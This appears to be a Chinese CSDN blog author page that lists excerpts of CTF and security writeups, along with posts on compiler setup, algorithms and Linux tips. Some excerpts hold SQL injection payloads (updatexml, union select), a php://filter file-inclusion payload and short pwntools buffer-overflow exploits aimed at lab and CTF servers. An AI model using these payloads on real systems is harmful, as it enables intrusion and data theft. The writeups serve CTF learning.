自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(46)
  • 收藏
  • 关注

原创 EGE图形库 vs配置错误解决

初教女友课设,配置环境,以官网配置,错误总存,无奈百度google大法失灵,突发奇想,定义变量,成功运行,遂记以助众人。错误显示E:/APP1/mingw64/bin/../lib/gcc/x86_64-w64-mingw32/8.1.0/../../../../x86_64-w64-mingw32/lib/../lib/libgraphics64.a(graphics.cpp.obj):graphics.cpp:(.text+0x1813): undefined reference to `_Unwi

2020-12-29 14:08:19 1492 1

原创 SQLI-LABS Page1 11-20

0x0B Less-11报错注入,只是注入方式为POST,可以直接使用报错函数进行注入,也可以使用常规方法报错注入,之后更改注入语句即可uname=admin' and updatexml(1,concat(0x7e,(database()),0x7e),1)#&passwd=123&submit=Submituname=admin' and updatexml(1,concat(0x7e,(select group_concat(table_name) from inform

2020-12-27 16:52:00 278

原创 SQLI-LABS Page1 1-10

0x01 Less-1 字符报错注入简单报错注入,分号检测payload:http://192.168.44.139/sqli-labs/Less-1/?id=1' union select 1,2,3,4 --+ 检测字段数,字段为3http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1,user(),3 --+查看用户:sqli@localhosthttp://192.168.44.139/sqli-labs/Less-

2020-12-14 11:17:26 341

原创 统计数字问题 算法

问题描述 统计一本书页码中数字出现的频率,不存在第0页和前导0的页码。问题思路 将一个页码分为几部分,利用递归解决例:页码为100451、计算0000—9999中每个数字的频率,可用公式f(n)=10n−1f(n) = 10^{n-1}f(n)=10n−1计算其中每个数字的频率2、1完成后,计算万位上1出现的频率,为10n10^n10n3、因为数字中间存在0,所以要计算中间两个0出现的次数4、将页码变为45,转至步骤1,直到页码为05、去除前导0所计算的次数代码#include &l

2020-05-20 23:26:49 692

原创 Linux内核0.11实验一 建立实验环境

0x01 环境说明Ubuntu16.04bochs虚拟机:运行内核linux内核0.11gcc-3.4简单环境下载:https://github.com/Wangzhike/HIT-Linux-0.11内部包含bochs和linux内核0.11的文件 0x02 安装相关依赖进入下载文件夹,运行setup.h安装libncurses5:i386和libexpat1-d...

2020-05-03 19:02:18 797

原创 BUUCTF web 极客大挑战 2019

0x01 Secret File 在源码之中得到一个php页面 后面页面之中 根据提示抓包,在其中返回的页面得到了信息 得到源码,根据源码,发现存在文件包含漏洞 利用php伪协议,获取flag.php的信息,拿取flagpayload:?file=php://filter/read=convert.base64-encode/resource=flag.phpEasyS...

2020-04-01 22:25:27 1774

原创 BUUCTF web 网鼎杯2018

0x01 Fakebook join可以加入一个账号,login则是登录 登录之后,看到这个页面,下面的blog框是一个内嵌页面 查看页面的robots.txt协议,能得到user.php的备份文件,可以看到一个UserInfo的类。<?phpclass UserInfo{ public $name = ""; public $age = 0; ...

2020-03-31 21:38:34 432

原创 BJD Crypto wp

签到-y1ngbase64解密:QkpEe1czbGMwbWVfVDBfQkpEQ1RGfQ==flag: BJD{W3lc0me_T0_BJDCTF}老文盲了罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝读音上的问题,将这些字放到百度翻译中听读音得到答案flag: BJD{淛匶襫黼瀬鎶軄鶛驕鳓哵}cat_flag[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直...

2020-03-25 21:39:14 452

原创 Windows 域的简单说明

0x01 简介 windows域是计算机网络的一种形式,一个域环境至少包括一个域控制器,在windows网络中,还有一种网络形式是工作组,工作组内部的成员其等级都是相同的,而域中的成员所持有的权限则是由域控制器控制。&esmp;windows域的目的就是为了对域成员进行集中管理,可以对域中的成员分发不同权限,域的成员主要包括计算机和用户,不同的计算机和用户都可以分发不同权限并进行集中...

2020-03-09 23:24:34 2625

原创 BUUCTF pwn题exp整合

0x01 ripfrom pwn import*p = remote('node3.buuoj.cn',27511)payload = 'a'*23+p64(0x401198)+p64(0x401186)p.sendline(payload)p.interactive() 0x02 warmup_csaw_2016from pwn import *#p = proces...

2020-02-29 09:26:30 661

原创 常用DOS命令总结

常用DOS命令总结文件相关命令dir 显示当前目录的文件信息 dir dir /a #显示所有的文件和目录信息,包括隐藏的文件和目录cd 在当前磁盘分区内切换目录 cd .. #切换至上层目录 cd ./configmd 建立文件夹 md dir1 dir2 #创建多个目录 md "abc def" #创建名称中带空格的目录del ...

2020-02-27 11:30:50 270

原创 BUUCTF jarvisoj exp整合

0x01 jarvisoj_level0 简单的地址改写from pwn import *p = remote('node3.buuoj.cn', 26882)#p = process('./level0')shell_addr = 0x0000000000400596p.sendline('a'*0x88+p64(shell_addr))p.interactive() ...

2020-02-24 11:00:56 578

原创 BUUCTF pwn ez_pz_hackover_2016

0x01 文件分析 没有不可执行栈和段上的读写保护,可以做到很多事情。 0x02 运行 输入name并且回显,上面还有一个地址。 0x03 IDA 主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写入shellcode,之后的vuln函数会将s的数据复制到vuln的栈上面,但是复制的数据量远远大于栈的长度,会造成栈溢出。 并且此函数的栈的地址直接打印出来,不用再去...

2020-02-21 11:48:39 2361

原创 BUUCTF re不一样的flag

0x01 0x02 运行 0x03 IDAint __cdecl main(int argc, const char **argv, const char **envp){ char v3; // [esp+17h] [ebp-35h] int v4; // [esp+30h] [ebp-1Ch] int v5; // [esp+34h] [ebp-18h] sig...

2020-02-20 10:33:12 398

原创 BUUCTF pwn pwn2_sctf_2016

0x01 分析 0x02 运行 程序读入一个长度,然后按照长度读入后面输入的data并回显。 0x03 IDA 数据长度被限制为32,无法溢出,接着查看get_n函数。 接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。 0x04 思路 输入负数长度,绕过长度检查,执行r...

2020-02-18 14:19:35 2505

原创 LibcSearcher添加kali自带libc

 LibcSearcher是一个pwn中比较好用的libc版本搜寻,并且带有libc-database,使用kali或者其他linux调试的时候,需要使用本机的libc文件,下面说一说怎么查找本机的libc和添加libc。查看本机使用libc以上分别是64位和32位的libc文件所在。添加libc找到LibcSearcher所在路径的libc-database文件夹下面,具体使用方法参...

2020-02-18 13:59:10 1760

原创 BUUCTF pwn babyfengshui_33c3_2016(简单堆)

0x01 文件分析 0x02 运行 程序提供了几个简单的功能,增删改查都有。运行的时候程序有定时机制,可以用IDA的patch功能修改二进制指令,消除定时。 0x03 静态分析主函数:void __cdecl __noreturn main(){ char v0; // [esp+3h] [ebp-15h] int v1; // [esp+4h] [ebp-14h] ...

2020-02-17 16:48:55 2031

原创 BUUCTF pwn [HarekazeCTF2019]baby_rop2

0x01 文件分析 0x02 运行 和babyrop一样。 0x03 IDA 程序流程和babyrop差不多,但是这个里面没有提供可用的gadget,需要自己完成rop。 0x04 思路 没有默认的gadget,需要自己构建,需要利用栈溢出和printf函数泄露libc版本和libc基址,再构建rop。需要注意的是printf函数需要用到的参数,第一个参数需要为格式化字符...

2020-02-17 15:40:25 1675 4

原创 BUUCTF pwn [HarekazeCTF2019]baby_rop

0x01 文件分析 0x02 运行 一组回显 0x03 IDA 程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。 0x04 思路 简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...

2020-02-13 14:09:40 2588

原创 BUUCTF pwn ciscn_2019_s_3(SROP)

0x01 文件分析 0x02 运行 有一个回显,并且还有多余的字符显示,接着看代码分析一下。 0x03 IDA源码 由后面的函数可以看出,这个程序使用的系统调用,并且vuln里面存在栈溢出。 在程序之中的gadgets存在着两个为rax赋值的gadget,15的系统号是rt_sigreturn,3b的系统调用是execve,利用这两个可以执行系统调用得到shell。 ex...

2020-02-13 11:04:19 1563

原创 BUUCTF pwn ciscn_2019_n_8

0x01 文件分析 文件很简单,32位,保护都开得差不多。 0x02 运行 输入并且回显。 0x03 IDA源码分析int __cdecl main(int argc, const char **argv, const char **envp){ int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch]...

2020-02-03 10:44:54 2616

原创 BUUCTF 第五空间2019 pwn5(格式化字符串)

0x01 文件分析32位elf无PIE 0x02 运行 运行文件之后,出现两处输入,一个name和一个passwd,并且name的输入有回显,则有可能是栈漏洞和格式化字符串。 0x03 IDA查看IDA F5反汇编之后的代码:int __cdecl main(int a1){ unsigned int v1; // eax int fd; // ST14_4 ...

2020-02-02 14:20:19 1030

原创 kali 安装gmpy2

kali 安装gmpy2kali默认安装时会报错:原因是缺少了一些系统依赖,分别是:gmp mpfr mpc安装以下依赖就可以完成安装gmpy2:apt-get install libgmp-devapt-get install libmpfr-devapt-get install libmpc-dev之后就可以正常使用了:...

2019-12-24 17:22:00 1564

原创 kali下sogou输入法候选词乱码问题

关于kali下搜狗输入法乱码问题这几天装双系统,安装kali2019.3,遇到了sogoupinyin输入中文乱码,不断尝试,终于解决问题,尝试方法如下:首先删除掉一些内容rm -rf SogouPY* sogou*输入中文乱码,我想到的可能就是编码表出了问题然后再安装码表的相关依赖apt-get install fcitx-table*由于本人只尝试了一次,不能保证一定成功,只...

2019-12-10 20:35:52 551

原创 BUUCTF ciscn_2019_c_1(rop_x64,泄露libc)

由于Ubuntu18的环境很迷,这个题目只在kali上用本地libc完成过,脚本也是kali环境的0x1 检查文件64位elf无canary无PIE 0x02 流程分析根据运行的流程,这个程序主要有两个功能,加密功能可以使用,但解密功能没办法使用,并且能够输入的地方就两个,一个选择程序,数字输入,第二个输入加密文本,字符串类型,之后的静态分析主要关注这两个地方。 0x02...

2019-11-26 23:07:12 5865 14

原创 攻防世界-pwn pwn-100(ROP)

此题是LCTF 2016年的pwn100参考文章:https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42933&ctid=1570x01 文件分析64位elf无stack无PIE 0x02 运行分析 看起来像一个无限循环,不断接收输入。 0x03 静态分析main:sub_40068E:...

2019-11-05 21:39:39 2966

原创 攻防世界-pwn stack2(ROP)

0x01 文件分析32位elf无PIE 0x02 运行分析 程序的功能主要有四个,在输入前面两个初始化的变量值之后,就可以看到后面的几个功能。 0x03 IDA分析//IDA 静态分析得出的代码:int __cdecl main(int argc, const char **argv, const char **envp){ int v3; // eax uns...

2019-10-28 21:21:14 1942 4

原创 攻防世界-pwn forgot(栈内变量覆盖)

0x01 文件检查32位elf无栈保护无地址随机化 0x02 程序运行分析 发现有两个输入的地方,并且第一个地方有回显。 0x03 IDA分析 如图,阅读程序结构后,发现第二个输入点(41行)可以进行栈溢出,第88行是调用的栈里面的函数地址,所以,如果将栈里面的*(&v3 + --v14)这个地址的内容变成我们需要的函数地址,就可以了。 搜索字符串,发...

2019-10-17 14:14:12 759 2

原创 攻防世界-pwn dice_game(栈内变量覆盖)

 0x01 检查文件 下载附件之后获得两个文件,一个可执行文件和一个libc,初步理解要使用libc。64位elf无栈保护动态链接 0x02 程序分析 根据程序运行分析,程序应该是要求猜数字,连续答对50轮可获得flag。 0x03 IDA结构分析 从里面分析,可以看到程序的结构,while循环里面是猜数字的流程,一共50轮,并可以注意到18行设置了随机数的种子。...

2019-10-09 19:31:25 538 1

原创 现代密码学之对称密码体制---DES

0x01 DES概述 DES(Data Encryption Standard),数据加密标准,曾被美国国家标准局确定为联邦信息处理标准,得到过广泛的使用。 DES起源于1973年美国国家标准局征求国家密码标准方案,IBM提交的算法基于Lucifer的密码,Lucifer是一种feistel密码,使用128位的密钥对64位的分组进行加密,然后受NSA的影响,对Lucifer进行了一些修改,形成...

2019-10-03 20:53:01 1553 10

原创 攻防世界-reverse Hello, CTF

0x01从题目分析,flag一定加密或者编码过。0x02 IDA分析IDA中主要看这三部分,第一部分是我们需要的flag,第二部分则是将我们输入的字符串转化为16进制,然后再将其转化为字符串储存在str中,第三部分则是判断输入的字符串转换之后是否和flag一样。0x03接下来,只要将16进制转化为字符串就可以拿到flag了。网络安全公众号,欢迎各位关注!...

2019-09-22 15:21:35 2955

原创 CTF中pwn的入门指南

CTF中pwn的入门指南pwn简介:CTF中的pwn指的是通过通过程序本身的漏洞,编写利用脚本破解程序拿到主机的权限,这就需要对程序进行分析,了解操作系统的特性和相关漏洞,是是一个难度比较大的分支。  接下来介绍相关的学习思路(自己总结的,当作参考)0x01 基础知识准备  pwn相对于web,更需要专业的技能和知识,最主要的是要学会如何分析程序,这就需要有足够的准备c语言汇编语言...

2019-09-13 13:50:31 30918 3

原创 攻防世界-pwn hello_pwn(地址溢出)

0x01 检查文件64位elf 可执行文件无栈保护无PIE 0x02 运行程序程序只有一个输入 0x03 IDA静态分析主函数:sub_400686()可以发现只要dword_60106C == 1853186401就可以拿到flag 继续分析发现程序输入的值存储在unk_601068之中,而dword_60106C就在unk...

2019-08-10 22:01:07 746

原创 攻防世界-pwn when_did_you_born(栈覆盖)

0x01拿到文件之后,先检查文件的基本信息文件信息64bit elf可执行文件无PIE保护 0x02执行文件文件之中有两个输入,第一个输入有回显 0x03 IDA静态分析可以看出获取flag需要用到v5的值,首先需要v5不等于1926,进入else这个块之中,然后又需要v5等于1926才能获取flag,就产生了矛盾。结合程序有两个输入,可以考...

2019-08-10 21:29:15 1402

原创 攻防世界-pwn CGfsb (格式化字符串)

0x01拿到题目之后首先分析文件得到信息:32bit ELF可执行文件未开启PIE(即静态反汇编得地址可以直接使用)0x02 执行文件执行文件之后发现程序接收两个输入并将其原样输出 0x03 利用IDA反汇编发现flag,需要将pwnme的值改为8才能拿到flag通过查找发现pwnme在bss段,并且在程序之中用到了printf,可以考虑用格式化串漏洞将...

2019-08-05 23:44:24 1581

原创 栅栏密码的变种WWW型

栅栏密码:  所谓栅栏密码,就是把要加密的明文分成N个一组,然后把每组的第1个字连起来,形成一段无规律的话。 不过栅栏密码本身有一个潜规则,就是组成栅栏的字母一般不会太多。传统型: 假如有一个字符串:123456789 取字符串长度的因数进行分组,假如key=3 1 2 3 \\分组情况,每三个数字一组,分为三组 4 5 6 7 8 9 然后每一组依次取一个数字组成一个新字符串...

2019-07-16 15:48:17 6642 8

原创 攻防世界-web writeup(xctf)

0x01 view sourceflag放在源码之中,但是网页的脚本限制了鼠标作用,无法点击和选中,直接F12或者浏览器快捷键查看网页源码即可得到flagflag:cyberpeace{e07dcafaeeb31df23b4d661dd4da56f9} 0x02 get_postGET和POST是http协议的两种主要请求方式GET请求直接把参数包含在url中POST...

2019-07-15 15:13:20 2512

原创 kali安装python3-pwntools

不要直接pip3安装错误方法:root@localhost:~# pip3 install pwntools //安装成功root@localhost:~# python3>>> import pwnTraceback (most recent call last): File "<stdin>", line 1, in <module> ...

2019-05-30 14:18:07 6819 1

原创 POJ-2251 Dungeon Master(三维空间BFS)

题目来源:POJ-2251 Dungeon MasterDescriptionYou are trapped in a 3D dungeon and need to find the quickest way out! The dungeon is composed of unit cubes which may or may not be filled with rock. It tak...

2018-09-27 14:23:08 181

原创 hdu1015 Safecracker(暴力求解)

题目来源:hdu1015 Safecracker Problem Description === Op tech briefing, 2002/11/02 06:42 CST === “The item is locked in a Klein safe behind a painting in the second-floor library. Klein safes are ext...

2018-09-13 18:52:01 178

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除